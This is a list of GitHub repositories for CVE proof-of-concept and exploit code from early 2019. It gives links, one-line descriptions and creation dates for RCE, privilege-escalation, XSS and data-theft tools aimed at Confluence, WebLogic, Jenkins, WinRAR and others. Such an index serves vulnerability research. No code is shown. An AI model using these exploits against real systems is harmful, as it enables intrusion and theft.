**CVE-2019-2725poc汇总 更新绕过CVE-2017-10271补丁POC** : [SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961](https://github.com/SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961) create time: 2019-04-25T03:07:53Z

**no description** : [likescam/CVE-2018-20250](https://github.com/likescam/CVE-2018-20250) create time: 2019-04-25T02:30:50Z

**A C# module to detect if a Jenkins server is vulnerable to the RCE vulnerability found in CVE-2019-1003000 (chained with CVE-2018-1000861 for pre-auth RCE)** : [1NTheKut/CVE-2019-1003000_RCE-DETECTION](https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION) create time: 2019-04-24T23:52:42Z

**no description** : [KeyStrOke95/nfsen_1.3.7_CVE-2017-6971](https://github.com/KeyStrOke95/nfsen_1.3.7_CVE-2017-6971) create time: 2019-04-24T02:45:17Z

**Source code for CVE-2013-2186** : [SPlayer1248/CVE_2013_2186](https://github.com/SPlayer1248/CVE_2013_2186) create time: 2019-04-23T04:56:29Z

**Code generate payload for CVE-2013-2186** : [SPlayer1248/Payload_CVE_2013_2186](https://github.com/SPlayer1248/Payload_CVE_2013_2186) create time: 2019-04-23T04:49:13Z

**Anviz M3 RFID CVE-2019-11523 PoC** : [wizlab-it/anviz-m3-rfid-cve-2019-11523-poc](https://github.com/wizlab-it/anviz-m3-rfid-cve-2019-11523-poc) create time: 2019-04-22T14:00:50Z

**cve-2017-17485 PoC** : [x7iaob/cve-2017-17485](https://github.com/x7iaob/cve-2017-17485) create time: 2019-04-21T13:36:03Z

**no description** : [TateYdq/CVE-2018-9995-ModifiedByGwolfs](https://github.com/TateYdq/CVE-2018-9995-ModifiedByGwolfs) create time: 2019-04-20T08:28:47Z

**Python script to exploit confluence path traversal vulnerability cve-2019-3398** : [superevr/cve-2019-3398](https://github.com/superevr/cve-2019-3398) create time: 2019-04-20T08:07:49Z

**CVE-2018-6574** : [d4rkshell/go-get-rce](https://github.com/d4rkshell/go-get-rce) create time: 2019-04-19T12:21:41Z

**An XML External Entity Injection (XXE) vulnerability in the Management System (console) of BlackBerry AtHoc versions earlier than 7.6 HF-567 could allow an attacker to potentially read arbitrary local files from the application server or make requests on the network by entering maliciously crafted XML in an existing field.** : [nxkennedy/CVE-2019-8997](https://github.com/nxkennedy/CVE-2019-8997) create time: 2019-04-18T01:09:02Z

**PoC for CVE-2018-18500 - Firefox Use-After-Free** : [sophoslabs/CVE-2018-18500](https://github.com/sophoslabs/CVE-2018-18500) create time: 2019-04-18T00:26:10Z

**A python script that tests for an exploitable instance of CVE-2018-1235.** : [AbsoZed/CVE-2018-1235](https://github.com/AbsoZed/CVE-2018-1235) create time: 2019-04-17T18:37:00Z

**Apache Tomcat Remote Code Execution on Windows** : [pyn3rd/CVE-2019-0232](https://github.com/pyn3rd/CVE-2019-0232) create time: 2019-04-15T07:54:25Z

**Multithreaded Padding Oracle Attack on Oracle OAM (CVE-2018-2879)** : [redtimmy/OAMBuster](https://github.com/redtimmy/OAMBuster) create time: 2019-04-14T16:32:08Z

**CVE-2018-16858 exploit implementation** : [4nimanegra/libreofficeExploit1](https://github.com/4nimanegra/libreofficeExploit1) create time: 2019-04-14T11:10:18Z

**jenkins CVE-2017-1000353 POC** : [vulhub/CVE-2017-1000353](https://github.com/vulhub/CVE-2017-1000353) create time: 2019-04-12T13:24:26Z

**no description** : [quantiti/CVE-2018-8284-Sharepoint-RCE](https://github.com/quantiti/CVE-2018-8284-Sharepoint-RCE) create time: 2019-04-11T08:41:41Z

**no description** : [rogue-kdc/CVE-2019-1253](https://github.com/rogue-kdc/CVE-2019-1253) create time: 2019-04-10T09:44:38Z

**no description** : [lilang-wu/POC-CVE-2018-4411](https://github.com/lilang-wu/POC-CVE-2018-4411) create time: 2019-04-10T08:55:55Z

**no description** : [s1xg0d/CVE-2019-3396](https://github.com/s1xg0d/CVE-2019-3396) create time: 2019-04-10T07:39:42Z

**Confluence 未授权 RCE (CVE-2019-3396) 漏洞** : [jas502n/CVE-2019-3396](https://github.com/jas502n/CVE-2019-3396) create time: 2019-04-10T02:22:24Z

**CVE-2019-3396 confluence SSTI RCE** : [Yt1g3r/CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP) create time: 2019-04-10T02:15:47Z

**Confluence Widget Connector path traversal (CVE-2019-3396)** : [x-f1v3/CVE-2019-3396](https://github.com/x-f1v3/CVE-2019-3396) create time: 2019-04-09T06:20:51Z

**CVE-2018-11235-Git PoC** : [qweraqq/CVE-2018-11235-Git-Submodule-CE](https://github.com/qweraqq/CVE-2018-11235-Git-Submodule-CE) create time: 2019-04-09T05:48:22Z

**A simple POC for CVE-2018-6574** : [qweraqq/CVE-2018-6574](https://github.com/qweraqq/CVE-2018-6574) create time: 2019-04-08T08:49:44Z

**Or how I turn off my TV via a cronjob** : [Nurdilin/CVE-2018-16706](https://github.com/Nurdilin/CVE-2018-16706) create time: 2019-04-07T08:30:12Z

**ManageEngine Service Desk Plus 10.0 Privilaged account Hijacking** : [FlameOfIgnis/CVE-2019-10008](https://github.com/FlameOfIgnis/CVE-2019-10008) create time: 2019-04-04T18:20:23Z

**Scripts for exploiting MSA-18-0020 (CVE-2018-16854) and MSA-19-0004 (CVE-2019-3847)** : [danielthatcher/moodle-login-csrf](https://github.com/danielthatcher/moodle-login-csrf) create time: 2019-04-04T17:24:47Z

**Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔** : [cldme/heartbleed-bug](https://github.com/cldme/heartbleed-bug) create time: 2019-04-03T21:32:50Z

**no description** : [ZecOps/TELUGU_CVE-2018-4124_POC](https://github.com/ZecOps/TELUGU_CVE-2018-4124_POC) create time: 2019-04-03T15:44:43Z

**no description** : [artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS](https://github.com/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS) create time: 2019-04-02T17:08:01Z

**A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6** : [alt3kx/CVE-2019-10685](https://github.com/alt3kx/CVE-2019-10685) create time: 2019-04-02T12:50:46Z

**Proof of Concept of Winbox Critical Vulnerability (CVE-2018-14847)** : [th3f3n1x87/winboxPOC](https://github.com/th3f3n1x87/winboxPOC) create time: 2019-04-01T07:20:23Z

**CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)** : [wildkindcc/CVE-2018-9276](https://github.com/wildkindcc/CVE-2018-9276) create time: 2019-03-31T08:51:07Z

**eps漏洞(CVE-2017-0261)漏洞分析** : [kcufId/eps-CVE-2017-0261](https://github.com/kcufId/eps-CVE-2017-0261) create time: 2019-03-31T07:29:48Z

**patches for SNYK-JS-JQUERY-174006, CVE-2019-11358, CVE-2019-5428** : [DanielRuf/snyk-js-jquery-174006](https://github.com/DanielRuf/snyk-js-jquery-174006) create time: 2019-03-30T10:03:36Z

**IBM Lotus Domino <= R8 Password Hash Extraction Exploit** : [schwankner/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit](https://github.com/schwankner/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit) create time: 2019-03-29T17:31:14Z

**cve-2018-5724와 같은 증상으로 디폴트 계정을 통해 관리자외 계정들을 얻어내는 취약점** : [gusrmsdlrh/Python-CVE-Code](https://github.com/gusrmsdlrh/Python-CVE-Code) create time: 2019-03-29T06:19:34Z

**ASUS SmartHome Exploit for CVE-2019-11061 and CVE-2019-11063** : [tim124058/ASUS-SmartHome-Exploit](https://github.com/tim124058/ASUS-SmartHome-Exploit) create time: 2019-03-29T06:01:49Z

**cve-2016-9838** : [cved-sources/cve-2016-9838](https://github.com/cved-sources/cve-2016-9838) create time: 2019-03-27T17:47:12Z

**CVE-2019-9978 - RCE on a Wordpress plugin: Social Warfare < 3.5.3** : [mpgn/CVE-2019-9978](https://github.com/mpgn/CVE-2019-9978) create time: 2019-03-25T23:38:58Z

**This program is an script developed in Python which exploit the ACE vulnerability on WinRar - Vulnerability CVE-2018-20250** : [DANIELVISPOBLOG/WinRar_ACE_exploit_CVE-2018-20250](https://github.com/DANIELVISPOBLOG/WinRar_ACE_exploit_CVE-2018-20250) create time: 2019-03-25T04:22:14Z

**CVE-2018-7600** : [drugeddon/drupal-exploit](https://github.com/drugeddon/drupal-exploit) create time: 2019-03-24T10:44:06Z

**RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420)** : [mpgn/Rails-doubletap-RCE](https://github.com/mpgn/Rails-doubletap-RCE) create time: 2019-03-23T02:52:31Z

**CVE-2017-5638 (PoC Exploits)** : [colorblindpentester/CVE-2017-5638](https://github.com/colorblindpentester/CVE-2017-5638) create time: 2019-03-22T23:25:49Z

**PoC Scan. (cve-2011-3368)** : [colorblindpentester/CVE-2011-3368](https://github.com/colorblindpentester/CVE-2011-3368) create time: 2019-03-22T23:13:12Z

**Security Research** : [padovah4ck/CVE-2019-0986](https://github.com/padovah4ck/CVE-2019-0986) create time: 2019-03-21T13:58:25Z

**windows 7 Ultimate Ultimate x64 poc of cve-2016-0095(MS16-034)** : [fengjixuchui/cve-2016-0095-x64](https://github.com/fengjixuchui/cve-2016-0095-x64) create time: 2019-03-21T09:33:19Z

**CVE-2018-11686 - FlexPaper PHP Publish Service RCE <= 2.3.6** : [mpgn/CVE-2018-11686](https://github.com/mpgn/CVE-2018-11686) create time: 2019-03-20T19:36:10Z

**POC for CVE-2017-10271. Since java.lang.ProcessBuilder was the original vector for RCE, there are multiple signature based rules that block this particular payload. Added java.lang.Runtime and will add others in the future. This is for educational purposes only: I take no responsibility for how you use this code.** : [kbsec/Weblogic_Wsat_RCE](https://github.com/kbsec/Weblogic_Wsat_RCE) create time: 2019-03-20T15:26:55Z

**GUI版 EXP** : [SkyBlueEternal/CVE-2018-1335-EXP-GUI](https://github.com/SkyBlueEternal/CVE-2018-1335-EXP-GUI) create time: 2019-03-20T14:38:09Z

**Herramienta para revisar si es que un payload tiene componente malicioso de acuerdo a CVE-2018-20250** : [joydragon/Detect-CVE-2018-20250](https://github.com/joydragon/Detect-CVE-2018-20250) create time: 2019-03-19T14:51:52Z

**no description** : [dollyptm/cve-2018-6574](https://github.com/dollyptm/cve-2018-6574) create time: 2019-03-19T12:54:23Z

**CVE-2018-16890** : [zjw88282740/CVE-2018-16890](https://github.com/zjw88282740/CVE-2018-16890) create time: 2019-03-19T05:10:48Z

**thinkphp5.*Rce CVE-2018-20062** : [NS-Sp4ce/thinkphp5.XRce](https://github.com/NS-Sp4ce/thinkphp5.XRce) create time: 2019-03-17T04:31:13Z

**no description** : [gluxon/CVE-2018-13257](https://github.com/gluxon/CVE-2018-13257) create time: 2019-03-16T16:37:53Z

**cve-2018-19207** : [cved-sources/cve-2018-19207](https://github.com/cved-sources/cve-2018-19207) create time: 2019-03-15T18:09:58Z

**cve-2018-16283** : [cved-sources/cve-2018-16283](https://github.com/cved-sources/cve-2018-16283) create time: 2019-03-15T18:07:13Z

**Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133** : [darrynten/MoodleExploit](https://github.com/darrynten/MoodleExploit) create time: 2019-03-15T14:25:20Z

**The exploit python script for CVE-2018-7600** : [madneal/codeql-scanner](https://github.com/madneal/codeql-scanner) create time: 2019-03-15T08:24:27Z

**Oracle-WebLogic-CVE-2017-10271** : [XHSecurity/Oracle-WebLogic-CVE-2017-10271](https://github.com/XHSecurity/Oracle-WebLogic-CVE-2017-10271) create time: 2019-03-15T01:50:01Z

**CVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE** : [mpgn/CVE-2018-19276](https://github.com/mpgn/CVE-2018-19276) create time: 2019-03-11T21:28:55Z

**no description** : [AeolusTF/CVE-2018-20250](https://github.com/AeolusTF/CVE-2018-20250) create time: 2019-03-11T07:33:45Z

**CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13** : [mpgn/CVE-2018-17246](https://github.com/mpgn/CVE-2018-17246) create time: 2019-03-08T20:06:15Z

**A WebKit exploit using CVE-2018-4441 to obtain RCE on PS4 6.20.** : [Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit](https://github.com/Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit) create time: 2019-03-08T18:06:10Z

**CVE-2018-20250-WINRAR-ACE Exploit with a UI** : [arkangel-dev/CVE-2018-20250-WINRAR-ACE-GUI](https://github.com/arkangel-dev/CVE-2018-20250-WINRAR-ACE-GUI) create time: 2019-03-08T12:27:12Z

**no description** : [coolboy0816/CVE-2018-8943](https://github.com/coolboy0816/CVE-2018-8943) create time: 2019-03-08T07:42:32Z

**no description** : [ze0r/CVE-2018-8639-exp](https://github.com/ze0r/CVE-2018-8639-exp) create time: 2019-03-05T14:18:07Z

**Python tool exploiting CVE-2018-20250 found by CheckPoint folks** : [Ektoplasma/ezwinrar](https://github.com/Ektoplasma/ezwinrar) create time: 2019-03-05T13:05:03Z

**WinRar is a very widely known software for windows. Previous version of WinRaR was a vulnerability which has been patched in Feb-2019. Most of the people didn't update winrar so they are vulnerable in this Absolute Path Traversal bug [CVE-2018-20250]** : [technicaldada/hack-winrar](https://github.com/technicaldada/hack-winrar) create time: 2019-03-04T11:36:43Z

**Simple POC to leverage CVE-2018-20250 from inside an EXE** : [n4r1b/WinAce-POC](https://github.com/n4r1b/WinAce-POC) create time: 2019-03-04T11:34:17Z

**no description** : [samueldustin/cve-2018-14665](https://github.com/samueldustin/cve-2018-14665) create time: 2019-03-03T19:12:56Z

**PoC Exploiting SQL Injection in Android's Download Provider (CVE-2018-9493)** : [IOActive/AOSP-DownloadProviderDbDumper](https://github.com/IOActive/AOSP-DownloadProviderDbDumper) create time: 2019-03-02T18:32:55Z

**PoC Exploiting Headers Disclosure in Android's Download Provider (CVE-2018-9546)** : [IOActive/AOSP-DownloadProviderHeadersDumper](https://github.com/IOActive/AOSP-DownloadProviderHeadersDumper) create time: 2019-03-02T18:32:17Z

**PoC Exploiting Permission Bypass in Android's Download Provider (CVE-2018-9468)** : [IOActive/AOSP-DownloadProviderHijacker](https://github.com/IOActive/AOSP-DownloadProviderHijacker) create time: 2019-03-02T18:31:11Z

**Debian OpenSSL Predictable PRNG (CVE-2008-0166) http://web.archive.org/web/20110723091928/http://digitaloffense.net/tools/debian-openssl/** : [nu11secur1ty/debian-ssh](https://github.com/nu11secur1ty/debian-ssh) create time: 2019-02-28T18:22:06Z

**no description** : [STP5940/CVE-2018-20250](https://github.com/STP5940/CVE-2018-20250) create time: 2019-02-28T17:07:52Z

**no description** : [ivnnn1/CVE-2018-6574](https://github.com/ivnnn1/CVE-2018-6574) create time: 2019-02-28T07:31:17Z

**Demonstration of the Heartbleed Bug CVE-2014-0160** : [cheese-hub/heartbleed](https://github.com/cheese-hub/heartbleed) create time: 2019-02-27T20:46:41Z

**Python CVE-2019-1003000 and CVE-2018-1999002 Pre-Auth RCE Jenkins** : [0xtavian/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins](https://github.com/0xtavian/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins) create time: 2019-02-23T10:00:03Z

**Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).** : [easis/CVE-2018-20250-WinRAR-ACE](https://github.com/easis/CVE-2018-20250-WinRAR-ACE) create time: 2019-02-23T01:20:34Z

**A version of the binary patched to address CVE-2018-20250** : [blunden/UNACEV2.DLL-CVE-2018-20250](https://github.com/blunden/UNACEV2.DLL-CVE-2018-20250) create time: 2019-02-22T14:19:20Z

**no description** : [nmweizi/CVE-2018-20250-poc-winrar](https://github.com/nmweizi/CVE-2018-20250-poc-winrar) create time: 2019-02-22T13:18:14Z

**010 Editor template for ACE archive format & CVE-2018-2025[0-3]** : [QAX-A-Team/CVE-2018-20250](https://github.com/QAX-A-Team/CVE-2018-20250) create time: 2019-02-22T06:47:01Z

**exp for https://research.checkpoint.com/extracting-code-execution-from-winrar** : [WyAtu/CVE-2018-20250](https://github.com/WyAtu/CVE-2018-20250) create time: 2019-02-22T04:52:08Z

**A Test and Debug Tool for ASPEED BMC AHB Interfaces** : [amboar/cve-2019-6260](https://github.com/amboar/cve-2019-6260) create time: 2019-02-21T22:49:53Z

**patch to fix CVE-2018-13410 of zip-30** : [shinecome/zip](https://github.com/shinecome/zip) create time: 2019-02-21T01:29:00Z

**PoC for CVE-2018-12086 affecting various OPC UA stacks** : [kevinherron/stack-overflow-poc](https://github.com/kevinherron/stack-overflow-poc) create time: 2019-02-20T16:11:26Z

**CVE-2019-5736 POCs** : [twistlock/RunC-CVE-2019-5736](https://github.com/twistlock/RunC-CVE-2019-5736) create time: 2019-02-20T12:23:13Z

**An app demo for test android webview security issue: CVE-2012-6636** : [xckevin/AndroidWebviewInjectDemo](https://github.com/xckevin/AndroidWebviewInjectDemo) create time: 2019-02-19T10:34:30Z

**Easy RM to MP3 Converter es un software que sufre de una vulnerabiliad de desbordamiento de buffer basada en la pila o StackBufferOverflow lo cual puede permite a los atacantes remotos ejecutar código arbitrario a través de un nombre de archivo largo en un archivo de lista de reproducción (.pls)** : [exploitwritter/CVE-2009-1330_EasyRMToMp3Converter](https://github.com/exploitwritter/CVE-2009-1330_EasyRMToMp3Converter) create time: 2019-02-18T19:07:02Z

**no description** : [stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape](https://github.com/stigtsp/CVE-2018-20162-digi-lr54-restricted-shell-escape) create time: 2019-02-14T02:20:13Z

**exploit for CVE-2018-4193** : [Synacktiv-contrib/CVE-2018-4193](https://github.com/Synacktiv-contrib/CVE-2018-4193) create time: 2019-02-13T13:06:11Z

**Linux privilege escalation exploit via snapd (CVE-2019-7304)** : [initstring/dirty_sock](https://github.com/initstring/dirty_sock) create time: 2019-02-12T06:02:06Z

**Source References for Published CVE & Advisory** : [yogeshshe1ke/CVE](https://github.com/yogeshshe1ke/CVE) create time: 2019-02-12T05:31:45Z

**no description** : [jltxgcy/CVE_2017_7533_EXP](https://github.com/jltxgcy/CVE_2017_7533_EXP) create time: 2019-02-12T01:28:24Z

**Exploitation of VirtualBox vulnerability (https://nvd.nist.gov/vuln/detail/CVE-2018-3295)** : [ndureiss/e1000_vulnerability_exploit](https://github.com/ndureiss/e1000_vulnerability_exploit) create time: 2019-02-11T21:44:47Z

**Takes advantage of CVE-2018-10933** : [Kurlee/LibSSH-exploit](https://github.com/Kurlee/LibSSH-exploit) create time: 2019-02-10T13:55:06Z

**Programa ideal para robar toda la información de un dispositivo remotamente a través de la aplicación AirDroid. [CVE-2019-9599] (https://www.exploit-db.com/exploits/46337)** : [s4vitar/AirDroidPwner](https://github.com/s4vitar/AirDroidPwner) create time: 2019-02-09T02:18:37Z

**cve-2018-15877** : [cved-sources/cve-2018-15877](https://github.com/cved-sources/cve-2018-15877) create time: 2019-02-08T18:15:37Z

**VMware NSX SD-WAN command injection vulnerability** : [r3dxpl0it/CVE-2018-6961](https://github.com/r3dxpl0it/CVE-2018-6961) create time: 2019-02-08T13:00:35Z

**TPM vulnerability checking tool for CVE-2018-6622. This tool will be published at Black Hat Asia 2019 and Black Hat Europe 2019** : [kkamagui/napper-for-tpm](https://github.com/kkamagui/napper-for-tpm) create time: 2019-02-07T06:45:27Z

**Exploiting CVE-2016-10277 for Secure Boot and Device Locking bypass** : [leosol/initroot](https://github.com/leosol/initroot) create time: 2019-02-04T21:12:56Z

**cve-2018-3811** : [cved-sources/cve-2018-3811](https://github.com/cved-sources/cve-2018-3811) create time: 2019-02-02T21:22:49Z

**cve-2018-3810** : [cved-sources/cve-2018-3810](https://github.com/cved-sources/cve-2018-3810) create time: 2019-02-02T21:19:32Z

**cve-2018-17207** : [cved-sources/cve-2018-17207](https://github.com/cved-sources/cve-2018-17207) create time: 2019-02-01T20:36:08Z

**Exploit script for Crossfire 1.9.0** : [Axua/CVE-2006-1236](https://github.com/Axua/CVE-2006-1236) create time: 2019-01-29T23:46:59Z

**Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC).** : [sk4la/cve_2011_3556](https://github.com/sk4la/cve_2011_3556) create time: 2019-01-29T20:22:09Z

**Sample project to test using Microsoft.CodeDom.Providers.DotNetCompilerPlatform 2.0.1 causing CVE-2017-0248** : [rubenmamo/CVE-2017-0248-Test](https://github.com/rubenmamo/CVE-2017-0248-Test) create time: 2019-01-29T13:23:24Z

**DVR username password recovery.** : [codeholic2k18/CVE-2018-9995](https://github.com/codeholic2k18/CVE-2018-9995) create time: 2019-01-28T00:16:48Z

**CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user.** : [hook-s3c/CVE-2018-18852](https://github.com/hook-s3c/CVE-2018-18852) create time: 2019-01-26T03:41:24Z

**Knot Resolver CVE-2018-10920 / DO NOT ABUSE** : [shutingrz/CVE-2018-10920_PoC](https://github.com/shutingrz/CVE-2018-10920_PoC) create time: 2019-01-25T16:24:49Z

**Reflected XSS on Opentext Portal v7.4.4: CVE-2018-20165** : [hect0rS/Reflected-XSS-on-Opentext-Portal-v7.4.4](https://github.com/hect0rS/Reflected-XSS-on-Opentext-Portal-v7.4.4) create time: 2019-01-24T13:59:14Z

**CVE-2018-8581** : [Ridter/Exchange2domain](https://github.com/Ridter/Exchange2domain) create time: 2019-01-24T06:08:23Z

**Full exploit for D-Link DCS-5020L, POC crash for others that are vulnerable as well.** : [tacnetsol/CVE-2019-10999](https://github.com/tacnetsol/CVE-2019-10999) create time: 2019-01-23T14:53:19Z

**This is a exp of CVE-2018-15473** : [LINYIKAI/CVE-2018-15473-exp](https://github.com/LINYIKAI/CVE-2018-15473-exp) create time: 2019-01-23T07:25:21Z

**Apache Tika Denial of Service Vulnerability (CVE-2018-11761)** : [brianwrf/CVE-2018-11761](https://github.com/brianwrf/CVE-2018-11761) create time: 2019-01-23T03:40:26Z

**Exploiting CVE-2017-7525 demo project with Angular7 frontend and Spring.** : [JavanXD/Demo-Exploit-Jackson-RCE](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE) create time: 2019-01-22T14:19:54Z

**Writeup for CVE-2017-16995 Linux BPF Local Privilege Escalation** : [senyuuri/cve-2017-16995](https://github.com/senyuuri/cve-2017-16995) create time: 2019-01-22T06:42:27Z

**iNPUT-ACE 2.2.1** : [GitHubAssessments/CVE_Assessment_01_2019](https://github.com/GitHubAssessments/CVE_Assessment_01_2019) create time: 2019-01-22T04:49:40Z

**cve-2018-15961** : [cved-sources/cve-2018-15961](https://github.com/cved-sources/cve-2018-15961) create time: 2019-01-21T18:15:17Z

**no description** : [stigtsp/CVE-2019-6690-python-gnupg-vulnerability](https://github.com/stigtsp/CVE-2019-6690-python-gnupg-vulnerability) create time: 2019-01-20T15:29:46Z

**CVE-2015-2794 auto finder** : [wilsc0w/CVE-2015-2794-finder](https://github.com/wilsc0w/CVE-2015-2794-finder) create time: 2019-01-20T12:48:36Z

**cve-2018-8453 exp** : [ze0r/cve-2018-8453-exp](https://github.com/ze0r/cve-2018-8453-exp) create time: 2019-01-18T10:40:03Z

**cve-2018-8453 exp** : [Mkv4/cve-2018-8453-exp](https://github.com/Mkv4/cve-2018-8453-exp) create time: 2019-01-18T05:24:22Z

**no description** : [duckzsc2/CVE-2018-6574-POC](https://github.com/duckzsc2/CVE-2018-6574-POC) create time: 2019-01-18T05:22:25Z

**cve-2018-1273** : [cved-sources/cve-2018-1273](https://github.com/cved-sources/cve-2018-1273) create time: 2019-01-17T17:55:17Z

**cve-2017-8046** : [cved-sources/cve-2017-8046](https://github.com/cved-sources/cve-2017-8046) create time: 2019-01-17T17:49:12Z

**cve-2017-7529** : [cved-sources/cve-2017-7529](https://github.com/cved-sources/cve-2017-7529) create time: 2019-01-17T17:47:34Z

**cve-2017-4971** : [cved-sources/cve-2017-4971](https://github.com/cved-sources/cve-2017-4971) create time: 2019-01-17T17:31:59Z

**cve-2017-12615** : [cved-sources/cve-2017-12615](https://github.com/cved-sources/cve-2017-12615) create time: 2019-01-17T17:30:03Z

**cve-2017-1000117** : [cved-sources/cve-2017-1000117](https://github.com/cved-sources/cve-2017-1000117) create time: 2019-01-17T17:28:01Z

**cve-2016-10033** : [cved-sources/cve-2016-10033](https://github.com/cved-sources/cve-2016-10033) create time: 2019-01-17T17:20:24Z

**Shortest Path Bridging (SPB-Mac) vulnerability testing scripts. Used in a network pentest to enumerate a new vuln (CVE-2016-2783) in Avaya VOSS Ethernet switches.** : [iknowjason/spb](https://github.com/iknowjason/spb) create time: 2019-01-17T14:35:11Z

**Social Network Tabs Wordpress Plugin Vulnerability - CVE-2018-20555** : [fs0c131y/CVE-2018-20555](https://github.com/fs0c131y/CVE-2018-20555) create time: 2019-01-16T14:45:44Z

**PoC files for CVE-2017-15277, use with neex/gifoeb** : [tacticthreat/ImageMagick-CVE-2017-15277](https://github.com/tacticthreat/ImageMagick-CVE-2017-15277) create time: 2019-01-15T01:20:44Z

**Proof of Concept - RCE Exploitation : Web Shell on Apache Tomcat - Ensimag January 2018** : [ygouzerh/CVE-2017-12617](https://github.com/ygouzerh/CVE-2017-12617) create time: 2019-01-14T20:58:29Z

**cve-2018-9207** : [cved-sources/cve-2018-9207](https://github.com/cved-sources/cve-2018-9207) create time: 2019-01-11T23:34:00Z

**cve-2018-9208** : [cved-sources/cve-2018-9208](https://github.com/cved-sources/cve-2018-9208) create time: 2019-01-11T22:28:36Z

**cve-2018-9206** : [cved-sources/cve-2018-9206](https://github.com/cved-sources/cve-2018-9206) create time: 2019-01-11T22:23:06Z

**cve-2018-16509** : [cved-sources/cve-2018-16509](https://github.com/cved-sources/cve-2018-16509) create time: 2019-01-11T22:19:46Z

**cve-2018-15473** : [cved-sources/cve-2018-15473](https://github.com/cved-sources/cve-2018-15473) create time: 2019-01-11T22:17:08Z

**cve-2017-8917** : [cved-sources/cve-2017-8917](https://github.com/cved-sources/cve-2017-8917) create time: 2019-01-11T22:13:56Z

**cve-2017-10271** : [cved-sources/cve-2017-10271](https://github.com/cved-sources/cve-2017-10271) create time: 2019-01-11T22:11:16Z

**cve-2017-1000486** : [cved-sources/cve-2017-1000486](https://github.com/cved-sources/cve-2017-1000486) create time: 2019-01-11T21:11:14Z

**cve-2016-8870** : [cved-sources/cve-2016-8870](https://github.com/cved-sources/cve-2016-8870) create time: 2019-01-11T21:08:27Z

**cve-2016-8869** : [cved-sources/cve-2016-8869](https://github.com/cved-sources/cve-2016-8869) create time: 2019-01-11T21:00:52Z

**CVE-2018-??? - CA Dollar Universe 5.3.3 'uxdqmsrv' - Privilege escalation via a vulnerable setuid binary** : [sasqwatch/ca-dollaru-uxdqmsrv-privesc](https://github.com/sasqwatch/ca-dollaru-uxdqmsrv-privesc) create time: 2019-01-10T18:36:58Z

**CVE-2018-6574** : [veter069/go-get-rce](https://github.com/veter069/go-get-rce) create time: 2019-01-10T11:09:06Z

**CVE-2009-4660 - BigAnt Server 2.52 'USV' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.** : [war4uthor/CVE-2009-4660](https://github.com/war4uthor/CVE-2009-4660) create time: 2019-01-09T23:47:50Z

**漏洞利用工具** : [0xMJ/CVE-2018-2628](https://github.com/0xMJ/CVE-2018-2628) create time: 2019-01-07T11:47:59Z

**CVE-2003-0222** : [phamthanhsang280477/CVE-2003-0222](https://github.com/phamthanhsang280477/CVE-2003-0222) create time: 2019-01-07T10:09:07Z

**poc for 0263** : [R06otMD5/cve-2017-0263-poc](https://github.com/R06otMD5/cve-2017-0263-poc) create time: 2019-01-07T04:21:25Z

**cve-2017-7494** : [cved-sources/cve-2017-7494](https://github.com/cved-sources/cve-2017-7494) create time: 2019-01-06T23:58:26Z

**cve-2015-5602** : [cved-sources/cve-2015-5602](https://github.com/cved-sources/cve-2015-5602) create time: 2019-01-06T23:50:01Z

**cve-2018-7600** : [cved-sources/cve-2018-7600](https://github.com/cved-sources/cve-2018-7600) create time: 2019-01-06T23:41:33Z

**CVE-2018-6389 PoC node js multisite with proxy** : [fakedob/tvsz](https://github.com/fakedob/tvsz) create time: 2019-01-06T22:57:48Z

**cve-2018-11776** : [cved-sources/cve-2018-11776](https://github.com/cved-sources/cve-2018-11776) create time: 2019-01-06T22:47:25Z

**cve-2016-7434** : [cved-sources/cve-2016-7434](https://github.com/cved-sources/cve-2016-7434) create time: 2019-01-06T22:15:24Z

**cve-2016-6515** : [cved-sources/cve-2016-6515](https://github.com/cved-sources/cve-2016-6515) create time: 2019-01-06T22:07:47Z

**cve-2015-8103** : [cved-sources/cve-2015-8103](https://github.com/cved-sources/cve-2015-8103) create time: 2019-01-06T22:01:09Z

**cve-2015-3306** : [cved-sources/cve-2015-3306](https://github.com/cved-sources/cve-2015-3306) create time: 2019-01-06T21:25:23Z

**cve-2015-1427** : [cved-sources/cve-2015-1427](https://github.com/cved-sources/cve-2015-1427) create time: 2019-01-06T21:18:13Z

**cve-2014-6271** : [cved-sources/cve-2014-6271](https://github.com/cved-sources/cve-2014-6271) create time: 2019-01-06T21:08:32Z

**cve-2014-0160** : [cved-sources/cve-2014-0160](https://github.com/cved-sources/cve-2014-0160) create time: 2019-01-06T20:57:53Z

**cve-2010-0426** : [cved-sources/cve-2010-0426](https://github.com/cved-sources/cve-2010-0426) create time: 2019-01-06T17:38:19Z

**CVE-2009-1324 - ASX to MP3 Converter Local Buffer Overflow. Tested on Windows XP Professional SP3** : [war4uthor/CVE-2009-1324](https://github.com/war4uthor/CVE-2009-1324) create time: 2019-01-06T12:06:15Z

